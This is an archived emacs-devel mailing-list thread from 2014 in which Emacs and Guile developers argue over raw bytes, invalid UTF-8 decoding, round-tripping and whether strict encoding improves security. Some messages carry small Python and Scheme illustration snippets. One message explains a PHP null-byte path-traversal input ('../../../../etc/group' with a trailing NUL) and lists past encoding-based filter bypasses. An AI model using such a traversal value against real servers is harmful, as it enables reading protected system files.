> In that case, it might be reasonable to ask the user whether to accept
> a UTF-8 file decoding that contains any raw-byte characters.
>
> What do people think of this?
>
>     One problem with that is that quite often Emacs' choice of a coding
>     system for a buffer is the result of heuristics rather than dependable
>     information.  Not making a fuzz might often be simplest.
>
> Could you explain what "fuzz" means here?

You load a file, edit a line, try saving.  Emacs complains that it feels
insecure doing so even though the line you edited is perfectly fine.
That's getting in the way of doing work.  It would be worse if Emacs
already prompted for approval when loading.
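
The raw-byte round trip quoted above (0xC0 0xA2 decoded into two
placeholder characters and reassembled on encoding) has a rough analogue
in Python's "surrogateescape" error handler.  This sketch shows the
analogy only; it is not how Emacs represents raw bytes internally.

```python
raw = b"\xc0\xa2"  # overlong two-byte sequence, not valid UTF-8


def strict_decode_fails(data):
    # A strict UTF-8 decoder refuses the overlong sequence.
    try:
        data.decode("utf-8")
    except UnicodeDecodeError:
        return True
    return False


# Each undecodable byte becomes one placeholder code point ...
escaped = raw.decode("utf-8", errors="surrogateescape")
# ... and encoding with the same handler restores the original bytes.
restored = escaped.encode("utf-8", errors="surrogateescape")
```

Here escaped holds two placeholder code points, one per byte, and
restored equals raw, so unmodified content is written back verbatim.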

More often than not, the locale applied for operations is not even
explicitly specified but a consequence of the user environment or
preexisting content.  Having internal operations and file read/write
fail depending on the state of the user environment is a nuisance.
That's particularly a danger when most core developers actually use
basic English locales and don't even notice the havoc "locale-awareness"
may cause.

A recurring phenomenon in that direction is generation of number
presentations that can no longer be processed because of being written
under the influence of an LC_NUMERIC setting developers did not expect.
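
A small Python sketch of that failure mode.  format_with_decimal_comma
is a hypothetical stand-in for output written under a locale whose
LC_NUMERIC uses a decimal comma; the real locale machinery is not
invoked, so the example does not depend on installed locales.

```python
def format_with_decimal_comma(value):
    # Stand-in for a number written under a decimal-comma locale.
    return ("%.2f" % value).replace(".", ",")


def parses_as_float(text):
    # A reader that expects the "C" locale's decimal point.
    try:
        float(text)
    except ValueError:
        return False
    return True


written = format_with_decimal_comma(3.14)
```

The value is written as "3,14", which parses_as_float rejects, whereas
"3.14" would have been read back without trouble.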

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-09  7:16                                                   ` Stephen J. Turnbull
@ 2014-10-09  7:47                                                     ` Eli Zaretskii
  2014-10-09 10:20                                                       ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-09  7:47 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: dak, rms, mhw, dmantipov, emacs-devel, handa, monnier

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Date: Thu, 09 Oct 2014 16:16:04 +0900
> Cc: rms@gnu.org, mhw@netris.org, dmantipov@yandex.ru, emacs-devel@gnu.org,
> 	handa@gnu.org, monnier@iro.umontreal.ca, eliz@gnu.org
> 
> Until you demonstrate at least a shred of understanding of something
> as fundamental as the differences in security requirements and
> attack surfaces of network *servers* and network *clients*, there's
> no point in discussing your statements further.

This kind of "argument" will get you no points here, cf Ian Grant.




* Re: Emacs Lisp's future
  2014-10-09  7:21                                                         ` Eli Zaretskii
@ 2014-10-09  7:52                                                           ` David Kastrup
  2014-10-09  8:41                                                             ` Eli Zaretskii
  2014-10-10 14:24                                                           ` Richard Stallman
  2014-10-10 14:24                                                           ` Richard Stallman
  2 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-09  7:52 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> I don't think we are talking about the same thing.  I am talking
>> about Lisp functions to do conversions on text that does NOT come
>> from files.
>
> ... Emacs treats all of these cases the same.

Well, on a fine-grained level.  We have something like


Coding system for saving this buffer:
  U -- utf-8-emacs-unix (alias: emacs-internal)

Default coding system (for new files):
  U -- utf-8-unix (alias: mule-utf-8-unix)

Coding system for keyboard input:
  U -- utf-8-unix (alias: mule-utf-8-unix)

Coding system for terminal output:
  U -- utf-8-unix (alias: mule-utf-8-unix)

Coding system for inter-client cut and paste:
  nil
Defaults for subprocess I/O:
  decoding: U -- utf-8-unix (alias: mule-utf-8-unix)

  encoding: U -- utf-8-unix (alias: mule-utf-8-unix)


Priority order for recognizing coding systems when reading files:
  1. utf-8 (alias: mule-utf-8)
  2. iso-2022-7bit 
  3. iso-latin-1 (alias: iso-8859-1 latin-1)
  4. iso-2022-7bit-lock (alias: iso-2022-int-1)
  5. iso-2022-8bit-ss2 
  6. emacs-mule 

[...]

  20. undecided 

  Other coding systems cannot be distinguished automatically
  from these, and therefore cannot be recognized automatically
  with the present coding system priorities.

Particular coding systems specified for certain file names:

  OPERATION	TARGET PATTERN		CODING SYSTEM(s)
  ---------	--------------		----------------
  File I/O	"\\.dz\\'"		(no-conversion . no-conversion)
		"\\.txz\\'"		(no-conversion . no-conversion)
[...]
  Process I/O	nothing specified
  Network I/O	nothing specified

> For text we are going to send to a process or network stream, we ask
> the above-mentioned question at the time we encode the internal
> representation into the external byte stream we are about to send.

It depends on how you specify the coding system.  When setting the
principally responsible variable for an operation, you get no questions
asked.  When setting some user-level specifiable preference, Emacs will
prompt for alternatives when accepting that preference unasked would
likely have user-level consequences that might or might not be
acceptable.

> E.g., you can see that in action in sending mail if you insert some
> raw bytes into a mail message in a *mail* buffer, and then try sending
> it.  There's no file involved here, at least not as far as Emacs is
> concerned, and yet you will see the same prompt asking you to select a
> proper encoding.

Well, in the case of mail that makes sense since otherwise the content
will not likely survive the designated channel.  It is perfectly
reasonable in my book to not silently go through with operations leading
to an expected loss of information.

I still don't want the autosave of mail to complain about bad
characters.  It's important that an application can pick where to apply
its checks and balances itself.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-09  4:49                                                 ` Mike Gerwitz
@ 2014-10-09  8:00                                                   ` Eli Zaretskii
  2014-10-09 10:50                                                     ` Stephen J. Turnbull
  2014-10-10 14:23                                                   ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-09  8:00 UTC (permalink / raw)
  To: Mike Gerwitz
  Cc: dak, rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Thu, 9 Oct 2014 00:49:17 -0400
> From: Mike Gerwitz <mikegerwitz@gnu.org>
> Cc: rms@gnu.org, dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	eliz@gnu.org
> 
> On Thu, Oct 09, 2014 at 12:56:42PM +0900, Stephen J. Turnbull wrote:
> > Richard Stallman writes:
> > 
> >  > If you demonstrate that this claim is valid, I will be concerned.
> > 
> > *sigh*  Be unconcerned.  The world is a *lot* more hostile today than
> > it was in the days when you posted your passwords on the 'net.
> 
> Agreed. Character encoding attacks are also something that has been
> exploited "in the wild". Some examples include:
> 
>   - UTF-7 character encoding to bypass filters[0] (e.g. for XSS);
>   - IIS WebDAV validation exploit (CVE-2009-1535);[1]
>   - CAPEC-80: Using UTF-8 Encoding to Bypass Validation Logic;[2] and
>   - Google's XSS vulnerability, related to the first item in this list.[3]
> 
> Note that not all of the above may be applicable to the specifics of this
> discussion---the point is to convey, generally, that character encoding
> poses serious threats when improperly handled. Though this discussion seems
> to be about what is "improper".

Aren't you again confusing the application level with the lower
"engine" level?  Applications, which do interpret the text, should
indeed be aware of these issues.  (For the purposes of this
discussion, "application" means Lisp code that processes text, or
presents it to the user, or acts according to user responses.)  But
the "engine" must be able to handle raw bytes, including invalid UTF-8
sequences, unless told otherwise.  Any other default will unduly
punish the innocent majority on behalf of the evil minority.

> With regards to passing raw input to other systems: this isn't necessarily
> Unicode related (unless an invalid sequence contains a null byte), but
> serves to illustrate the point that Mark is trying to make: there is a
> well-known issue in PHP whereby passing a null byte as a parameter to a
> script (e.g. via HTTP GET/POST) opens up a number of attacks.  Specifically,
> PHP handles null bytes in strings (by storing the string length as part of
> the struct that holds the string). However, it makes calls directly to libc.
> So, if an unvalidated input $foo contains "../../../../etc/group\000", and
> PHP makes a call to `fopen' with the path "/webroot/modules/$foo/index.php",
> the result would be opening "/webroot/modules/../../../../etc/group".

So what would you have Emacs do when I'm editing a file with binary
nulls: ask me for each save whether I really mean it, and lecture me
about possible security implications?  The encoding routines have no
idea whether they are encoding a PHP script, much less whether it will
be sent via HTTP.

> I can dig up more examples, but hopefully some of these help to illustrate
> the severity of ignoring character encoding concerns.

Please do, but (a) please make the examples be relevant to what Emacs
does with decoding and encoding external bytestreams, and (b) please
suggest what you think Emacs should do in those cases instead of what
it does now.  Otherwise, this discussion is much less constructive
than it could be, because our concerns are with how the discussed
issues will or should affect Emacs.




* Re: Emacs Lisp's future
  2014-10-09  7:31                                                                           ` Stephen J. Turnbull
@ 2014-10-09  8:05                                                                             ` David Kastrup
  0 siblings, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-09  8:05 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa,
	monnier, Andreas Schwab, Eli Zaretskii

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> David Kastrup writes:
>
>  > > who may lose their life savings if a filter for 419 phish fails
>  > 
>  > Can we have terrorism with that scaremongering?
>
> Are you really unaware that such exploits happen every day?

So does terrorism.  But the existence of threats is no excuse for
handwaving justifications of measures that do nothing to address the
threats.

> You're not the only programmer who deprecates security because *your*
> applications are "secure enough" and it "can't" happen to you, you
> know.

At the current point of time, we are more talking about deprecating
security theatre rather than security.  Primitive operations that fail
rather than process and pass on information are attack vectors for
denial-of-service attacks.

> Unfortunately, I'm not the one who lacks understanding.  I'm well
> aware that security is costly in convenience and functionality.

How about you explain in what respect XEmacs' non-round-trippability of
utf-8 encoding helps with the security of running AUCTeX?

How about explaining in what respect it helps with security in _any_
regard that XEmacs is not able to faithfully reproduce its input?  How
are you even supposed to _scan_ for malicious input if you refuse to
decode it in a recognizable manner?

Again: the responsibilities of an engine and of an application are
different.  And not understanding that and thinking that the former can
somehow absolve the latter from doing its job if it is annoying
enough...  Security theatre.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-09  7:52                                                           ` David Kastrup
@ 2014-10-09  8:41                                                             ` Eli Zaretskii
  2014-10-09  9:22                                                               ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-09  8:41 UTC (permalink / raw)
  To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> From: David Kastrup <dak@gnu.org>
> Cc: rms@gnu.org,  mhw@netris.org,  dmantipov@yandex.ru,  emacs-devel@gnu.org,  handa@gnu.org,  monnier@iro.umontreal.ca,  stephen@xemacs.org
> Date: Thu, 09 Oct 2014 09:52:31 +0200
> 
> I still don't want the autosave of mail to complain about bad
> characters.

We write the auto-save files in the internal format, so it never
complains.




* Re: Emacs Lisp's future
  2014-10-09  8:41                                                             ` Eli Zaretskii
@ 2014-10-09  9:22                                                               ` David Kastrup
  2014-10-13  3:04                                                                 ` Mark H Weaver
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-09  9:22 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> From: David Kastrup <dak@gnu.org>
>> Cc: rms@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
>> emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
>> stephen@xemacs.org
>> Date: Thu, 09 Oct 2014 09:52:31 +0200
>> 
>> I still don't want the autosave of mail to complain about bad
>> characters.
>
> We write the auto-save files in the internal format, so it never
> complains.

If you are not allowed or able to do that...  At the current point of
time, the only round-trippable encoding for bytes that GUILE offers is
latin-1, and the only round-trippable encoding for characters is utf-8.
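
As a rough illustration of that round-trip claim, here is a minimal
sketch, assuming a Guile version that provides the (ice-9 iconv)
module.  The byte values and the names `raw' and `as-latin-1' are made
up for the example.

```scheme
(use-modules (ice-9 iconv)        ; bytevector->string, string->bytevector
             (rnrs bytevectors))  ; u8-list->bytevector

;; Arbitrary bytes, including some that are not valid UTF-8.
(define raw (u8-list->bytevector '(#x25 #x21 #xff #xfe #x00 #x80)))

;; Latin-1 maps every byte to exactly one character, so decoding and
;; re-encoding should give back the same bytes.
(define as-latin-1 (bytevector->string raw "ISO-8859-1"))
(display (equal? (string->bytevector as-latin-1 "ISO-8859-1") raw))
(newline)

;; Decoding the same bytes as UTF-8 with the 'error strategy is expected
;; to signal an error rather than return a string; catch it to see that.
(display (catch #t
           (lambda () (bytevector->string raw "UTF-8" 'error) 'decoded)
           (lambda args 'decoding-error)))
(newline)
```

The first check is the byte-level round trip through latin-1; the
second shows why utf-8 alone cannot carry arbitrary bytes when the
decoder is strict.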

The conceptual lack of separation between internal and external utf-8
encoding leads to strangenesses like

scheme@(guile-user)> (with-input-from-string "\ufeff!" read-char)
$8 = #\!

Yes, this is a string->string operation losing a byte order mark in
spite of no indication that I would like to get encodings involved in
any manner.

Now we'll probably get "oh, that's a bug, we'll fix it".  But the point
is that being sloppy with the distinction between internal and external
character sets and encodings and "valid" and "invalid" will buy you
unmatched encoding/decoding passes inviting such problems.

And when I can say "let's see where this kind of thinking will lead" and
find a hole to poke within a minute, so will malicious people.  And that
is a real security concern.

Also: if I do not even manage to save a string into a string in "the
internal format" unchanged, good luck with your auto-save file.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-09  7:47                                                     ` Eli Zaretskii
@ 2014-10-09 10:20                                                       ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-09 10:20 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, rms, mhw, dmantipov, emacs-devel, handa, monnier

Eli Zaretskii writes:

 > This kind of "argument" will get you no points here, cf Ian Grant.

It's not an argument, it's an explanation of why I'm leaving the
conversation.






* Re: Emacs Lisp's future
  2014-10-09  8:00                                                   ` Eli Zaretskii
@ 2014-10-09 10:50                                                     ` Stephen J. Turnbull
  2014-10-09 11:06                                                       ` David Kastrup
  2014-10-09 11:27                                                       ` Eli Zaretskii
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-09 10:50 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, rms, handa, mhw, dmantipov, emacs-devel, Mike Gerwitz,
	monnier

Eli Zaretskii writes:

 > Aren't you again confusing the application level with the lower
 > "engine" level?

No, you and David are confused.  All experience with programming
systems shows that if you leave security up to the application
programmers, you won't get enough.  Remember, the security of a system
is equal to the minimum of the security levels of its components.

Of course the engine level needs to provide the *option* to be
flexible.  But that flexibility must be opt-in for the applications
that need to be nonconformant, not opt-out for the applications that
are happy to conform.  The latter won't bother ("it's too much to
type").

In the case of Emacs coding systems, it's as simple as choosing to
name the conformant coding system 'utf-8, and the non-conformant one
'utf-8-with-rawbytes.  Why does this excite such <adjective deleted>
opposition?






* Re: Emacs Lisp's future
  2014-10-09 10:50                                                     ` Stephen J. Turnbull
@ 2014-10-09 11:06                                                       ` David Kastrup
  2014-10-09 17:23                                                         ` Richard Stallman
  2014-10-09 11:27                                                       ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-09 11:06 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, handa, mhw, dmantipov, emacs-devel, Mike Gerwitz, monnier,
	Eli Zaretskii

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Eli Zaretskii writes:
>
>  > Aren't you again confusing the application level with the lower
>  > "engine" level?
>
> No, you and David are confused.  All experience with programming
> systems shows that if you leave security up to the application
> programmers, you won't get enough.  Remember, the security of a system
> is equal to the minimum of the security levels of its components.

Annoying and distracting the application programmer is not providing
additional security.  It's security theatre.

> In the case of Emacs coding systems, it's as simple as choosing to
> name the conformant coding system 'utf-8, and the non-conformant one
> 'utf-8-with-rawbytes.  Why does this excite such <adjective deleted>
> opposition?

So first I let the locale and other mechanisms choose an encoding, then
try getting at its choice of coding system before any prompts appear,
then I convert the symbol to a string, check whether the string ends
with "-with-rawbytes" and append it if needed (let's hope it is in the
right location with regard to "-dos" or "-unix" endings) and
lo-and-behold, I am allowed to read a file.  Or network connection.  Or
console output.  If I don't get that, either my control flow will be
affected, or I will receive falsified data not corresponding to the
input that I can't even check for bad bytes and for which I am unable to
figure out byte offsets of various parts in the input because I can no
longer reconstruct the input faithfully.

"Stuff refuses to work" will lose you more users than "stuff refuses to
secondguess".

Stuff like PostScript files are text files with occasional binary
sections.  That's real-world data and dealing with it should not require
preannouncing it every time explicitly.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-09 10:50                                                     ` Stephen J. Turnbull
  2014-10-09 11:06                                                       ` David Kastrup
@ 2014-10-09 11:27                                                       ` Eli Zaretskii
  1 sibling, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-09 11:27 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, rms, handa, mhw, dmantipov, emacs-devel, mikegerwitz,
	monnier

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Cc: Mike Gerwitz <mikegerwitz@gnu.org>,
>     dak@gnu.org,
>     rms@gnu.org,
>     mhw@netris.org,
>     dmantipov@yandex.ru,
>     emacs-devel@gnu.org,
>     handa@gnu.org,
>     monnier@iro.umontreal.ca
> Date: Thu, 09 Oct 2014 19:50:37 +0900
> 
> In the case of Emacs coding systems, it's as simple as choosing to
> name the conformant coding system 'utf-8, and the non-conformant one
> 'utf-8-with-rawbytes.

We already tried something akin to that, and the users almost
unanimously wanted Emacs to opt-in by default.

> Why does this excite such <adjective deleted> opposition?

Because we've been-there-done-that, and have enough gray hair to prove
that what you are asking will be met with staunch user opposition.




* Re: Emacs Lisp's future
  2014-10-09 11:06                                                       ` David Kastrup
@ 2014-10-09 17:23                                                         ` Richard Stallman
  2014-10-09 17:37                                                           ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-09 17:23 UTC (permalink / raw)
  To: David Kastrup
  Cc: mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, stephen,
	eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    So first I let the locale and other mechanisms choose an encoding, then
    try getting at its choice of coding system before any prompts appear,
    then I convert the symbol to a string, check whether the string ends
    with "-with-rawbytes" and append it if needed

Is that really a likely scenario?

I expect that a program, doing some non-editing job involving a
network connection, ought to specify a fixed coding system in accord
with the protocol it is communicating with.

If there are programs that want to heuristically select coding systems
for purposes other than reading files, and want to allow raw bytes
when UTF-8 is selected, we can easily accommodate them by providing a
way to say, "If the heuristics say this is utf-8, use the coding
system utf-8-raw-bytes."

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-09 17:23                                                         ` Richard Stallman
@ 2014-10-09 17:37                                                           ` Eli Zaretskii
  2014-10-12  3:24                                                             ` Richard Stallman
  0 siblings, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-09 17:37 UTC (permalink / raw)
  To: rms; +Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

> Date: Thu, 09 Oct 2014 13:23:43 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: stephen@xemacs.org, handa@gnu.org, mhw@netris.org,
> 	dmantipov@yandex.ru, emacs-devel@gnu.org, mikegerwitz@gnu.org,
> 	monnier@iro.umontreal.ca, eliz@gnu.org
> 
>     So first I let the locale and other mechanisms choose an encoding, then
>     try getting at its choice of coding system before any prompts appear,
>     then I convert the symbol to a string, check whether the string ends
>     with "-with-rawbytes" and append it if needed
> 
> Is that really a likely scenario?

It is what happens with all our general-purpose commands and APIs that
invoke subprocesses, like shell-command, shell-command-on-region,
start-process, etc.  The default is to use the locale-specific
encoding, and users, of course, are not required to type any specific
coding systems when they invoke those commands/functions.

> I expect that a program, doing some non-editing job involving a
> network connection, ought to specify a fixed coding system in accord
> with the protocol it is communicating with.

The protocols rarely specify encoding, AFAIK.  If they do, we do use
them, e.g., when decoding an email message that specifies its MIME
charset.  But that comes _after_ we already have read the mail into a
buffer in its raw undecoded form.

And, of course, when you invoke a program locally, there's usually no
protocol at all involved.




* Re: Emacs Lisp's future
  2014-10-06 19:15                                         ` Richard Stallman
  2014-10-07  0:46                                           ` Stephen J. Turnbull
@ 2014-10-10 10:09                                           ` Thien-Thi Nguyen
  1 sibling, 0 replies; 261+ messages in thread
From: Thien-Thi Nguyen @ 2014-10-10 10:09 UTC (permalink / raw)
  To: emacs-devel


() Richard Stallman <rms@gnu.org>
() Mon, 06 Oct 2014 15:15:20 -0400

   Do people write spam/virus checkers using Guile?

   This issue is specifically about Guile.

Two examples that jump to mind:

GNU Mailutils (http://www.gnu.org/software/mailutils/),
specifically its "Sieve" handling (based on RFC 3028),
is extensible w/ Guile.

In ttn-do (http://www.gnuvola.org/software/ttn-do/),
the program "magic" is a file(1)-workalike, which basically
means it trundles through unknown byte sequences, sometimes
interpreting them as strings.

-- 
Thien-Thi Nguyen
   GPG key: 4C807502
   (if you're human and you know it)
      read my lisp: (responsep (questions 'technical)
                               (not (via 'mailing-list)))
                     => nil


* Re: Emacs Lisp's future
  2014-10-09  3:06                                               ` Stephen J. Turnbull
  2014-10-09  3:44                                                 ` David Kastrup
@ 2014-10-10 14:23                                                 ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-10 14:23 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    It would be "nice" and "efficient" for Guile to implement properties
    natively so that Emacs could just use those, but Mark is correct to
    worry that those properties would be used to bypass validation modules
    written for pre-property Guile versions.

You keep claiming that is correct while presenting no evidence it is
correct.  Put up or shut up.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-09  3:56                                               ` Stephen J. Turnbull
  2014-10-09  4:49                                                 ` Mike Gerwitz
@ 2014-10-10 14:23                                                 ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-10 14:23 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

     > you need to show it is real security and really does a useful job.

    I suspect I can't give you a convincing example, because I haven't
    studied the Guile modules "at risk",

Someone else is welcome to convince me, too.

It seems to me that your argument must be false.
You're saying that module A could pass data to module C
through properties in a string passed through module B.
Yes, it could.  But module A could put the same data in
a global variable and C could read it there.
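
The A/B/C argument can be sketched in Scheme as follows.  Every name
below is hypothetical, and the three "modules" are plain procedures
standing in for real Guile modules, so this only illustrates the shape
of the argument.

```scheme
(define side-channel #f)              ; global visible to both A and C

(define (module-a secret)
  (set! side-channel secret)          ; A stashes the data outside the string
  (string-copy "plain text"))         ; and hands B an innocent-looking string

(define (module-b str)
  ;; B validates only what it can see: the characters of the string.
  (unless (string-every (lambda (c) (< (char->integer c) 128)) str)
    (error "non-ASCII input rejected"))
  str)

(define (module-c str)
  (list str side-channel))            ; C reads the global, bypassing B

(display (module-c (module-b (module-a 'payload))))
(newline)
```

B's check passes, yet C still receives the payload, without any text
properties being involved.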

So where is the "security"?

    Or how about the recent bash lossage?  s-expressions are just Lisp
    data, and could be placed in a property.

These two cases are different in their essential structure.  The Bash
case involves a browser that sends data thru Apache to trick Bash,
with both Apache and Bash being honest.  To do this, it has to fiddle
with data that Bash will look at for some legitimate purpose.

In this case, we have to suppose that A and C are BOTH malicious, and
the question is whether B can (as a security measure) prevent them
from communicating.

I challenge people to demonstrate that Guile provides some real
security against such communication, in the absence of text properties
in strings.

If you can't, then pipe down and leave this to someone else who can.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-09  4:49                                                 ` Mike Gerwitz
  2014-10-09  8:00                                                   ` Eli Zaretskii
@ 2014-10-10 14:23                                                   ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-10 14:23 UTC (permalink / raw)
  To: Mike Gerwitz
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen, eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    > *sigh*  Be unconcerned.  The world is a *lot* more hostile today than
    > it was in the days when you posted your passwords on the 'net.

    Agreed. Character encoding attacks are also something that has been
    exploited "in the wild". Some examples include:

You're talking about character encoding, but the message you responded to
was about whether to put text properties in GUILE strings.
The two issues are unrelated.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-09  7:21                                                         ` Eli Zaretskii
  2014-10-09  7:52                                                           ` David Kastrup
@ 2014-10-10 14:24                                                           ` Richard Stallman
  2014-10-10 15:28                                                             ` Eli Zaretskii
  2014-10-10 14:24                                                           ` Richard Stallman
  2 siblings, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-10 14:24 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    > I don't think we are talking about the same thing.  I am talking about Lisp
    > functions to do conversions on text that does NOT come from files.

    ... Emacs treats all of these cases the same.

They don't HAVE to be treated the same.  We are talking about changes,
here.

But changes may not be needed.  All operations that do encoding or
decoding allow explicit specification of the coding system.


-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-09  7:21                                                         ` Eli Zaretskii
  2014-10-09  7:52                                                           ` David Kastrup
  2014-10-10 14:24                                                           ` Richard Stallman
@ 2014-10-10 14:24                                                           ` Richard Stallman
  2014-10-10 15:38                                                             ` Eli Zaretskii
       [not found]                                                             ` <<83r3yg9bpu.fsf@gnu.org>
  2 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-10 14:24 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    > Asking about invalid UTF-8 in a file could be a nuisance, but how much
    > of a nuisance depends on the details of what we do.  Since this has
    > some security implications, it is worth a small amount of nuisance.

    That wasn't what users felt, overwhelmingly.

Felt when?  About what behavior?

I asked

    > What exactly did we try before?

and you responded

    AFAIR, we tried converting raw bytes into valid non-ASCII characters,
    and perhaps also replacing them with the equivalent of u+FFFD, the
    Unicode "replacement character".

But those are both different from the proposal I'm discussing.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-09  7:36                                                     ` David Kastrup
@ 2014-10-10 14:25                                                       ` Richard Stallman
  0 siblings, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-10 14:25 UTC (permalink / raw)
  To: David Kastrup; +Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    >     One problem with that is that quite often Emacs' choice of a coding
    >     system for a buffer is the result of heuristics rather than dependable
    >     information.  Not making a fuzz might often be simplest.
    >
    > Could you explain what "fuzz" means here?

    You load a file, edit a line, try saving.  Emacs complains that it feels
    insecure doing so even though the line you edited is perfectly fine.

Sorry, I do not follow you.  Are you proposing a change in current
Emacs behavior?  If so, what change would that be?

    A recurring phenomenon in that direction is generation of number
    presentations that can no longer be processed because of being written
    under the influence of an LC_NUMERIC setting developers did not expect.

I am lost here.  Can you present a specific example?
Do you have a bug to report?

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-10 14:24                                                           ` Richard Stallman
